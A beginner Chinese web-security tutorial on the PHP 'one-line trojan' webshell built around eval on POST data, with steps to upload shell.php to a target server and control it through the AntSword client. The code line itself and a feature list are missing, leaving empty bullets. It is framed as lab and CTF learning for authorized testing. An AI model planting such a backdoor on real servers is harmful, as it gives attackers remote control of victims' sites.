web入门—— 一句话木马
🕵️ 一、什么是“一句话木马”?
“一句话木马”是指只用一句简单代码写成的Web 后门脚本,攻击者可以通过它远程控制网站服务器,上传/下载文件、执行命令、查看数据库等。
它是 Web 渗透中最常见的一种后门。
🧬 二、最常见的一句话木马(PHP版)
📌 说明:
-
是 PHP 脚本标签 -
@eval(...)会执行传进来的 PHP 代码 -
$_POST[\'pass\']意味着:攻击者通过 POST 提交的内容将会在服务器上“执行”
这就是一句话:把木马放上服务器,然后通过 POST 提交代码远程控制!
🛠️ 三、使用蚁剑连接这句话木马
✅ 第一步:准备一句话木马文件
-
在本地创建一个
shell.php文件 -
写入一句话:
ant是密码(你可以写成别的,比如pass,不过蚁剑里也要对应设置)
-
上传
shell.php到目标服务器的 Web 根目录下(比如:http://example.com/shell.php)
✅ 第二步:打开蚁剑并连接
-
打开蚁剑(AntSword)
-
新建一个 WebShell(文件 → 新建)
配置如下:
-
类型:PHP
-
URL:填入你上传木马的地址,例如:
http://example.com/shell.php -
密码:
ant(要和木马里的变量名一致) -
编码:自动(或 UTF-8)
-
点击“确定”,如果能成功连接,就进入了蚁剑的控制面板!
🧰 四、连接成功后你可以干什么?
蚁剑支持以下功能:
📢 安全提示(学习用途)
-
一句话木马是合法渗透测试中的工具,禁止在未授权网站使用!
-
如果你在学习 CTF 或 Web 安全实验环境中使用,那是非常有帮助的练习方式
-
建议在自己的本地服务器或靶场中练习(比如 DVWA、Vulhub)
